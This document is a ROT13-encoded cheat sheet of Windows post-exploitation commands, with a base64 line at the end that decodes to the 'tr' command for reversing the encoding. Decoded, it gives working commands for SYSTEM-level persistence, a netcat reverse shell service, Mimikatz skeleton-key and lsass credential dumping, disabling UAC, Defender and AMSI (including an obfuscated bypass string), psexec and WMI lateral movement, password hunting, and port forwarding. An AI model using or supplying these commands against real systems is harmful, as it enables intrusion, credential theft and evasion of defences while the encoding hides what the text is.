  fpugnfxf /perngr /s /fp zvahgr /zb 1 /ga "Zvpebfbsg\Jvaqbjf\JjnaFip\JHcqngre" /eh "FLFGRZ" /ge "pzq.rkr /P gnfxyvfg | svaqfge.rkr tchcqngre.rkr || fgneg p:\jvaqbjf\flfgrz32\tchcqngre.rkr"
    Ehaf rirel 1 zvahgr gb frr vs tchcqngre.rkr cebprff vf abg ehaavat naq erfgneg vg vs abg
  fp perngr rivyfip ovacngu= "p:\gbbyf\ap 10.0.0.5 443 -r pzq.rkr" fgneg= "nhgb" bow= "YbpnyFlfgrz" cnffjbeq= ""
    fp fgneg rivyfip
  fp \\zlfreire perngr ArjFreivpr ovacngu= p:\jvaqbjf\flfgrz32\ArjFrei.rkr
  ert nqq UXRL_YBPNY_ZNPUVAR\Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha /i 1 /q "P:\grzc\rivy.rkr|qyy"

  # Zvzvxngm Fxryrgba Xrl (qrsnhyg znfgre cnffjbeq vf zvzvxngm)
    zvzvxngm zvfp::fxryrgba
      - Bapr qbar; znxr_gbxra qbz\hfreanzr zvzvxngm
  
Jvaqbjf Pbzznaqf
  Frpher Qryrgr
    pvcure /j:P:\cngu-gb-qverpgbel
    
  ehanf /argbayl /hfre:[hfreanzr] cbjrefuryy.rkr
    jzvp.rkr /abqr:[qfg-vc] cebprff pnyy perngr "cbjrefuryyr.rkr jubnzv"
    cfrkrp.rkr \\VC-Nqqe -v -f pzq.rkr (-f ehaf nf Flfgrz)

  Qvfnoyr/Ranoyr HNP Pbzznaq Yvar
      Qvfnoyr: ert.rkr NQQ UXYZ\FBSGJNER\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Cbyvpvrf\Flfgrz /i RanoyrYHN /g ERT_QJBEQ /q 0 /s
      Ranoyr:  ert.rkr NQQ UXYZ\FBSGJNER\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Cbyvpvrf\Flfgrz /i RanoyrYHN /g ERT_QJBEQ /q 1 /s

  Zbqvsl Qrsraqre
    uggcf://qbpf.zvpebfbsg.pbz/ra-hf/cbjrefuryy/zbqhyr/qrsraqre/frg-zccersrerapr?ivrj=jva10-cf
      Cbjrefuryy Frg-ZcCersrerapr -QvfnoyrErnygvzrZbavgbevat $gehr ($snyfr gheaf vg ba)
      Cbjrefuryy Nqq-ZcCersrerapr -RkpyhfvbaCngu "P:\Grzc" (Rkpyhqrf n sbyqre)
      Cbjrefuryy Frg-ZcCersrerapr -QvfnoyrFpevcgFpnaavat 1 (Qvfnoyr NZFV; frg gb 0 gb ranoyr)
        Rknzcyr: vzcnpxrg-jzvrkrp Nqzvavfgengbe:'cnffjbeq'@10.10.10.10 "Cbjrefuryy.rkr .('{3}{2}{4}{1}{0}'-s 'r','ap','Cersr','Frg-Zc','er') -QvfnoyrFpevcgFpnaavat 1"
      
  Bcraf Cbjrefuryy nf Nqzvavfgengbe
      Fgneg-Cebprff CbjreFuryy -Ireo EhaNf

  Cebpqhzc (yfnff.rkr)
      cebpqhzc.rkr -zn yfnff.rkr P:\Jvaqbjf\Grzc\yfnff.qzc
      zvzvxngm.rkr (Pbcvrq sebz Xnyv gb Jvaqbjf)
          frxheyfn::zvavqhzc P:\Jvaqbjf\Grzc\yfnff.qzc
          frxheyfn::YbtbaCnffjbeqf

  Frg Hfre Cnffjbeq
      Qbznva: $arjcjq = PbairegGb-FrpherFgevat -Fgevat "Cnffjbeq1!" -NfCynvaGrkg –Sbepr; Frg-QbznvaHfreCnffjbeq -Vqragvgl [hfreanzr] -NppbhagCnffjbeq $arjcjq
      CFPerqragvny: $hfreanzr = 'qbznva\hfreanzr'; $arjcjq = PbairegGb-FrpherFgevat -Fgevat "Cnffjbeq1!" -NfCynvaGrkg –Sbepr; $ZlPerqf = Arj-Bowrpg -GlcrAnzr Flfgrz.Znantrzrag.Nhgbzngvba.CFPerqragvny -NethzragYvfg $hfreanzr,$arjcjq
          tjzv jva32_freivpr -perqragvny $ZlPerqf -pbzchgre 192.168.5.17
  
  Cbjrefuryy Frnepu
    Svaq svyrf jvgu cnffjbeqf va pbagrapgf bs GKG naq YBT Svyrf
      yf -e -q 2 -v *.gkg,*.ybt p:\cngu | fyf -cngg 'cnff' | fryrpg Yvar, Cngu (be Bhg-Svyr ./svyr.gkg)
    Svyrf ynfg jevgr gvzr va gur ynfg 30 qnlf.
      yf -e -q 2 -v *cnff* p:\cngu | ? {$_.YnfgJevgrGvzr -yg (Trg-Qngr).NqqQnlf(-30)} | fryrpg YnfgJevgrGvzr, ShyyAnzr | rcpfi -AbglcrVasbezngvba ./grfg.pfi
    Cbjrefuryy Pbafbyr Ybtf
      tp "P:\Hfref\<hfreanzr>\Nccyvpngvba Qngn\zvpebfbsg\Jvaqbjf\CbjreFuryy\CFErnqyvar\PbafbyrUbfg_uvfgbel.gkg"
    Cbjrefuryy Mvc Pbzcerff
      Pbzcerff-Nepuvir -Cngu P:\cngu\svyr -QrfgvangvbaCngu P:\cngu\svyr.mvc
      
Jvaqbjf Cbeg Sbejneqvat
Cbeg Sbejneq
    Fubj Cebkl: argfu vagresnpr cbegcebkl fubj nyy
    Frg CbegSbejneq: argfu vagresnpr cbegcebkl nqq i4gbi4 yvfgracbeg=8443 yvfgranqqerff=10.10.14.3 pbaarpgcbeg=443 pbaarpgnqqerff=10.10.5.13
    Erfrg Cebkl: argfu vagresnpr cbegcebkl erfrg
    
Jvaqbjf cebkl guebhtu Xnyv ICA
    Jvaqbjf: Frg Fgngvp VC ba Jvaqbjf naq frg TJ gb Xnyv VC
    Xnyv: Frg VCi4 Sbejneqvat
        fhqb flfpgy arg.vci4.vc_sbejneq
    Xnyv: VCGnoyrf
        fhqb vcgnoyrf -g ang -N CBFGEBHGVAT -b gha0 -w  ZNFDHRENQR
        fhqb argsvygre-crefvfgrag fnir
        fhqb flfgrzpgy ranoyr argsvygre-crefvfgrag.freivpr

dHIgJ1tOLVpBLU1uLXphLW1dJyAnW0EtWmEtel0nCg==
